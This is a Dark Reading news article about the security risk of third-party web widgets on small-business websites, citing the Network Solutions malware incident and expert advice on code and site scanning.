Careful With That Third-Party Web WidgetSmaller businesses are more likely to use third-party Web applications on their websites -- and they are less likely to scan such code
Small- and midsized businesses use a lot of third-party Web applications: It saves them money and allows them to embed expertise that they might not otherwise have. But it can also open up their business and their customers to attack.
The recent Network Solutions incident shows how this practice can go very wrong: Ten days ago, the Internet domain provider learned that a Web-services widget that it had placed on at least 120,000 parked Web pages was infecting visitors with malware. The firm reportedly downloaded the widget, known as the Small Business Success Index, on third-party online directory WidgetBox.
As more businesses continue to use third-party code in their websites and import content from other sites, the security of their visitors increasingly relies on others.
"Over the past five years, Web 2.0 has taken the world by storm," says Neil Daswani, chief technology officer of Web scanning firm Dasient. "As a website administrator, your security is actually dependent on a bunch of third parties, so you should make sure to monitor all your code and widgets."
Network Solutions is not the only Internet company to inadvertently host malicious code on its website. A year ago, The New York Times infected an unknown number of visitors with a rogue program after fraudsters posed as a legitimate advertiser and submitted a virus-laden ad to the news service. Other websites -- such as Snapple.com, BusinessWeek and Fox News -- have had to deal with similar problems, Daswani notes.
The impact on a business hosting rogue code on its website can be dramatic and long-term. If Google flags a site as malicious because it's hosting rogue code, traffic can drop by as much as 95 percent, Daswani says. "We have received feedback from customers that even when the resolve the issue and their site is un-blacklisted, there still is an impact on their traffic," he says.
Solving this issue is not easy. There is no standard or accepted way to certify that code is safe and secure, says Andy Chou, chief scientist for code scanning firm Coverity. "In other industries, there are certifications for certain quality measurements of the products," Chou says. "There are lots of ways in other industries to show the consumer what they are getting. In software, there is nothing like that -- the users have to test it themselves."
Companies should scan programs for malicious software or Trojan horses on a regular basis, security experts say. Developers can use a static scanner to scan source code for security vulnerabilities. Run-time scanners and antivirus scanners can be used to detect malicious activity in widgets and programs before they are posted to a website.
However, the sites should be checked frequently as well, says Wayne Huang, chief technology officer of site-scanning firm Armorize. "A combination is a good approach," Huang says. "Source-code scanning has its limitations, but so does honey-client-type Web scanning."
Security experts don't expect more companies to regularly scan their sites until a larger number suffer from issues similar to Network Solutions.
"This is an area that people are only now waking up to," says Coverity’s Chou. "From our experience with software development organizations, all of them have substantial portions of their resources built by third parties ... Anywhere where software is used, it is put together from different sources."
Have a comment on this story? Please click "Discuss" below. If you'd like to contact Dark Reading's editors directly, send us a message.